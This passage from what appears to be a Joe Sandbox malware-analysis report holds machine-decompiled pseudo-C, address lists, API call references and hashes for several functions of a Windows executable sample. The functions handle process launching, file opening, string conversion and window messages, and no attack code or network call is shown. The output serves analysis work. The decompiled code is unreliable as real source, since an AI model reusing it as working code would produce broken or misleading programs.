						_t84 =  &(_t93[_t58]);
					} while ( *_t84 != _t79);
					goto L13;
				}
			}

0x0101ce22
0x0101ce22
0x0101ce27
0x0101ce2e
0x0101ce35
0x0101ce3a
0x0101d08b
0x0101d093
0x0101d093
0x0101ce41
0x0101ce4c
0x00000000
0x0101ce52
0x0101ce55
0x0101ce5d
0x0101ce62
0x0101ce69
0x0101ce6c
0x0101ce70
0x0101ce7a
0x0101ce7c
0x0101ce7c
0x0101ce84
0x0101ce87
0x0101ce8a
0x0101ce8d
0x0101ce91
0x0101ce93
0x0101ce93
0x0101ce95
0x0101ce99
0x0101ce9e
0x0101ced6
0x0101ced6
0x0101ceda
0x0101cedd
0x0101cee6
0x0101cef1
0x0101cef1
0x0101cee6
0x0101cf01
0x0101cf0a
0x0101cf0e
0x0101cf1f
0x0101cf1f
0x0101cf32
0x0101cf42
0x0101cf4b
0x0101cf4b
0x0101cf54
0x0101cf5c
0x0101cf62
0x0101cf6f
0x0101cf84
0x0101cf86
0x0101cf8f
0x0101cf93
0x0101cf99
0x0101cf99
0x0101cf8f
0x0101cfa4
0x0101cfae
0x0101cfba
0x0101cfd9
0x0101cfe3
0x0101cfe5
0x0101cfe5
0x0101cfea
0x0101cfea
0x0101cfba
0x0101cff5
0x0101cffd
0x0101d015
0x0101d01c
0x0101d02a
0x0101d02a
0x0101d072
0x0101d072
0x0101d072
0x0101d07b
0x0101d084
0x0101d084
0x0101d07b
0x00000000
0x0101d08a
0x0101cea0
0x0101cea2
0x0101ceaa
0x0101cead
0x0101d03c
0x0101d03c
0x0101d041
0x00000000
0x00000000
0x0101d03a
0x0101d048
0x0101d04c
0x0101ceb7
0x0101cebb
0x0101d05d
0x0101d061
0x0101d061
0x0101d066
0x0101d069
0x00000000
0x00000000
0x00000000
0x00000000
0x0101cebb
0x0101d03a
0x0101d043
0x0101ceb3
0x00000000
0x0101cecd
0x0101cecd
0x0101cece
0x0101ced1
0x00000000
0x0101ceaa

APIs

ShellExecuteExW.SHELL32(?), ref: 0101CF54
ShowWindow.USER32(?,00000000), ref: 0101CF93
GetExitCodeProcess.KERNEL32 ref: 0101CFCF
CloseHandle.KERNEL32(?), ref: 0101CFF5
ShowWindow.USER32(?,00000001), ref: 0101D084

Part of subcall function 010117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0100BB05,00000000,.exe,?,?,00000800,?,?,010185DF,?), ref: 010117C2

Strings

, xrefs: 0101CEA2
.exe, xrefs: 0101CFFF
.inf, xrefs: 0101CF10

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 6c93e19203c19037674b70e4535b2bbb24ab4cb2925e3d620877a1e94840a450
Instruction ID: 92cb4f46bfea61797081fe9c126763b4b44a079bd738ab17faf2933b267cff15
Opcode Fuzzy Hash: 6c93e19203c19037674b70e4535b2bbb24ab4cb2925e3d620877a1e94840a450
Instruction Fuzzy Hash: 25610070444380AAFB329F68D5046ABBFE9AF81344F04485DF6C09725DDBBED585CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0102A058, Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0102A058(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0102E6ED(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0101EC4A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0102A2C0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0102A72C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0102A2C0(_t101);
									goto L36;
								}
								_t62 = E0102A72C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0102A2C0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E01028518(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E01031A30();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0102A72C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E01028518(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E01031A30();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x0102a05d
0x0102a05e
0x0102a05f
0x0102a066
0x0102a06a
0x0102a06b
0x0102a071
0x0102a077
0x0102a07d
0x0102a080
0x0102a080
0x0102a083
0x0102a085
0x0102a085
0x0102a083
0x0102a087
0x0102a08c
0x0102a093
0x0102a096
0x0102a096
0x0102a0b2
0x0102a0b8
0x0102a0bd
0x0102a250
0x0102a263
0x0102a0c3
0x0102a0c3
0x0102a0c6
0x0102a0cb
0x0102a0cf
0x0102a123
0x0102a123
0x0102a125
0x0102a127
0x0102a245
0x0102a245
0x0102a247
0x0102a248
0x00000000
0x0102a24e
0x0102a138
0x0102a13e
0x0102a140
0x00000000
0x00000000
0x0102a146
0x0102a158
0x0102a15d
0x0102a161
0x00000000
0x00000000
0x0102a16e
0x0102a1a8
0x0102a1ab
0x0102a1ae
0x0102a1b0
0x0102a1b2
0x0102a1b4
0x0102a200
0x0102a200
0x0102a202
0x0102a202
0x0102a204
0x0102a23e
0x0102a23f
0x00000000
0x0102a244
0x0102a218
0x0102a21d
0x0102a21f
0x00000000
0x00000000
0x0102a223
0x0102a224
0x0102a225
0x0102a228
0x0102a264
0x0102a267
0x0102a22a
0x0102a22a
0x0102a22b
0x0102a22b
0x0102a238
0x0102a23a
0x0102a23c
0x0102a26d
0x00000000
0x00000000
0x00000000
0x00000000
0x0102a23c
0x0102a1b6
0x0102a1b9
0x0102a1bb
0x0102a1bd
0x0102a1bf
0x0102a1c2
0x0102a1c7
0x0102a1e2
0x0102a1e4
0x0102a1ee
0x0102a1f0
0x0102a1f1
0x0102a1f3
0x00000000
0x00000000
0x0102a1f5
0x0102a1fb
0x0102a1fb
0x00000000
0x0102a1fb
0x0102a1c9
0x0102a1cb
0x0102a1cf
0x0102a1d4
0x0102a1d6
0x0102a1d8
0x00000000
0x00000000
0x0102a1da
0x00000000
0x0102a1da
0x0102a170
0x0102a175
0x00000000
0x00000000
0x0102a17b
0x0102a17d
0x00000000
0x00000000
0x0102a194
0x0102a199
0x0102a19d
0x00000000
0x00000000
0x00000000
0x0102a1a3
0x0102a0d6
0x0102a0d8
0x0102a0da
0x0102a0e2
0x0102a101
0x0102a103
0x0102a10d
0x0102a10f
0x0102a110
0x0102a112
0x00000000
0x00000000
0x0102a118
0x0102a11e
0x0102a11e
0x00000000
0x0102a11e
0x0102a0e6
0x0102a0ea
0x0102a0ef
0x0102a0f3
0x00000000
0x00000000
0x0102a0f9
0x00000000
0x0102a0f9

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,01024E35,01024E35,?,?,?,0102A2A9,00000001,00000001,3FE85006), ref: 0102A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0102A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0102A232
__freea.LIBCMT ref: 0102A23F

Part of subcall function 01028518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102C13D,00000000,?,010267E2,?,00000008,?,010289AD,?,?,?), ref: 0102854A

__freea.LIBCMT ref: 0102A248
__freea.LIBCMT ref: 0102A26D

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cf07d3ca020bb18e298090542412e350db46595eb066271484622e7037cf5dc7
Instruction ID: 6d2fcb1bdf9270eea4999e6ac89a0d1dbbcd78b137fb1e6bb40f35150daa7f80
Opcode Fuzzy Hash: cf07d3ca020bb18e298090542412e350db46595eb066271484622e7037cf5dc7
Instruction Fuzzy Hash: 6151DF72700236EEEB258E68CC80FBF7BEAEB45660B154269FD84D7540DF39DC4486A0

Uniqueness

Uniqueness Score: -1.00%

Function 0101A2C7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0101A2C7(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E010117AC( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x0101a2d7
0x0101a2de
0x0101a2e6
0x0101a2e9
0x0101a2f6
0x0101a2fd
0x0101a305
0x0101a30b
0x0101a30b
0x0101a30d
0x0101a310
0x0101a315
0x00000000
0x0101a315
0x0101a31f

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0101A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0101A315

Part of subcall function 010117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0100BB05,00000000,.exe,?,?,00000800,?,?,010185DF,?), ref: 010117C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0101A305

Strings

plWv, xrefs: 0101A315
EDIT, xrefs: 0101A2E9, 0101A2F4, 0101A301

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT$plWv
API String ID: 4243998846-3413696572
Opcode ID: a77c8aa6c4559c867b1292a6aa63f79df8663e354f480b7cb7b00fa1ba342874
Instruction ID: 64c5a5b4b5a1834810873d060e500ddded55e39d7db34da1a81ec053178b5ad7
Opcode Fuzzy Hash: a77c8aa6c4559c867b1292a6aa63f79df8663e354f480b7cb7b00fa1ba342874
Instruction Fuzzy Hash: 00F0E232B02228B7F63059289C08FDB7BAC9F46B40F044092FE84E3189D7A99941C6F6

Uniqueness

Uniqueness Score: -1.00%

Function 010099B0, Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010099B0(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t49;
				long _t60;
				unsigned int _t62;
				long _t65;
				signed int _t66;
				char _t69;
				void* _t73;
				void* _t75;
				long _t79;
				void* _t82;

				_t75 = __esi;
				E0101E360();
				_t62 = _a4188;
				_t73 = __ecx;
				 *(__ecx + 0x1024) =  *(__ecx + 0x1024) & 0x00000000;
				if( *((char*)(__ecx + 0x22)) != 0 || (_t62 & 0x00000004) != 0) {
					_t69 = 1;
				} else {
					_t69 = 0;
				}
				_push(_t75);
				asm("sbb esi, esi");
				_t79 = ( ~(_t62 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t62 & 0x00000001) != 0) {
					_t79 = _t79 | 0x40000000;
				}
				_t65 =  !(_t62 >> 3) & 0x00000001;
				if(_t69 != 0) {
					_t65 = _t65 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t73 + 0x1b)) != 0x00000000) - 0x00000001 & 0x08000000;
				E010070BF( &_a12);
				if( *((char*)(_t73 + 0x20)) != 0) {
					_t79 = _t79 | 0x00000100;
				}
				_t49 = CreateFileW(_a4184, _t79, _t65, 0, 3, _v0, 0); // executed
				_t82 = _t49;
				if(_t82 != 0xffffffff) {
					L17:
					if( *((char*)(_t73 + 0x20)) != 0 && _t82 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t82, 0,  &_a4, 0);
					}
					 *((char*)(_t73 + 0x18)) = 0;
					_t66 = _t65 & 0xffffff00 | _t82 != 0xffffffff;
					 *((intOrPtr*)(_t73 + 0xc)) = 0;
					 *((char*)(_t73 + 0x10)) = 0;
					if(_t82 != 0xffffffff) {
						 *(_t73 + 4) = _t82;
						E0100FE56(_t73 + 0x24, _a4184, 0x800);
						 *((char*)(_t73 + 0x21)) = 0;
					}
					return _t66;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E0100B66C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t73 + 0x1024)) = 1;
						}
						goto L17;
					}
					_t82 = CreateFileW( &_a12, _t79, _t65, 0, 3, _v0, 0);
					_t60 = GetLastError();
					if(_t60 == 2) {
						_a4.dwLowDateTime = _t60;
					}
					if(_t82 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}

0x010099b0
0x010099b5
0x010099bb
0x010099c4
0x010099c6
0x010099d1
0x010099dc
0x010099d8
0x010099d8
0x010099d8
0x010099e2
0x010099ea
0x010099f2
0x010099fb
0x010099fd
0x010099fd
0x01009a08
0x01009a0d
0x01009a0f
0x01009a0f
0x01009a24
0x01009a28
0x01009a31
0x01009a33
0x01009a33
0x01009a4c
0x01009a52
0x01009a57
0x01009abb
0x01009ac0
0x01009ac7
0x01009ad0
0x01009adb
0x01009adb
0x01009ae6
0x01009ae9
0x01009aec
0x01009aef
0x01009af5
0x01009b06
0x01009b0a
0x01009b0f
0x01009b0f
0x01009b1e
0x01009a59
0x01009a5f
0x01009a7b
0x01009aaa
0x01009aaf
0x01009ab1
0x01009ab1
0x00000000
0x01009aaf
0x01009a94
0x01009a96
0x01009a9f
0x01009aa1
0x01009aa1
0x01009aa8
0x00000000
0x00000000
0x00000000
0x00000000
0x01009aa8

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,010078AD,?,00000005,?,00000011), ref: 01009A4C
GetLastError.KERNEL32(?,?,010078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 01009A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,010078AD,?,00000005,?), ref: 01009A8E
GetLastError.KERNEL32(?,?,010078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 01009A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,010078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 01009ADB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: d5f1813f5de73931b18c40d5a11ad3fba7cafc44ebc9ac308329b33557ed0262
Instruction ID: 611ff2ee3775282effc36ee64394856802373fdd297d2e86281d4fd8b99121f0
Opcode Fuzzy Hash: d5f1813f5de73931b18c40d5a11ad3fba7cafc44ebc9ac308329b33557ed0262
Instruction Fuzzy Hash: 6F4148305447466FF7328A28CC45BDABBD4BB06328F100719F6E8961C2D779A4C8CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0102B610, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0102B610() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0102B5D9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E01028518(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E010284DE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0102b61f
0x0102b625
0x0102b67d
0x0102b67d
0x0102b627
0x0102b628
0x0102b62d
0x0102b636
0x0102b63c
0x0102b642
0x0102b647
0x00000000
0x0102b649
0x0102b64a
0x0102b64f
0x0102b654
0x0102b672
0x0102b66c
0x0102b66c
0x0102b66e
0x0102b66e
0x0102b675
0x0102b67a
0x0102b647
0x0102b681
0x0102b684
0x0102b684
0x0102b692

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0102B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102B63C

Part of subcall function 01028518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102C13D,00000000,?,010267E2,?,00000008,?,010289AD,?,?,?), ref: 0102854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102B662
_free.LIBCMT ref: 0102B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102B684

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 091ce846f89be0e6abaac01a9e967cfc8e109f6bf4a307098adebf62df849369
Instruction ID: 35d964e390f89d4179481828bc521b899ac998630e3a897fe75b30310bb2854a
Opcode Fuzzy Hash: 091ce846f89be0e6abaac01a9e967cfc8e109f6bf4a307098adebf62df849369
Instruction Fuzzy Hash: 23018472A01235BF2371157A6C8CCBFBFADEECA9A53150269FE84C7144DE698D0192B0

Uniqueness

Uniqueness Score: -1.00%

Function 0101AC74, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0101AC74() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x1048458; // 0xc0084
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}

0x0101ac85
0x0101ac8d
0x0101ac96
0x0101ac9c
0x0101aca3
0x0101acb4
0x0101acb8
0x0101acc2
0x00000000
0x0101acc2
0x0101acaa
0x0101acb2
0x00000000
0x00000000
0x0101acb2
0x0101accc

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101AC96
IsDialogMessageW.USER32(000C0084,?), ref: 0101ACAA
TranslateMessage.USER32(?), ref: 0101ACB8
DispatchMessageW.USER32(?), ref: 0101ACC2

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: e5df2cb94db1148971e1498bdcc73f2208767c103a8788fde65c2cf844e5e407
Instruction ID: a509839972911314d9e0db6fd4860e076c3068556cf3b9313f1bfc71a8c97065
Opcode Fuzzy Hash: e5df2cb94db1148971e1498bdcc73f2208767c103a8788fde65c2cf844e5e407
Instruction Fuzzy Hash: 39F01D7190222DAB9B309BE59C4CDEB7FADEE052A17404855F549D3149EA2DD005C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 0101A335, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0101A335(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E01010085(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x106217c(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x1062034( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0101E23E(); // executed
				 *0x1062088(0x1048430,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}

0x0101a344
0x0101a34b
0x0101a34e
0x0101a357
0x0101a35f
0x0101a366
0x0101a370
0x0101a37b
0x0101a37f
0x0101a382
0x0101a385
0x0101a38f
0x0101a39c

APIs

Part of subcall function 01010085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 010100A0
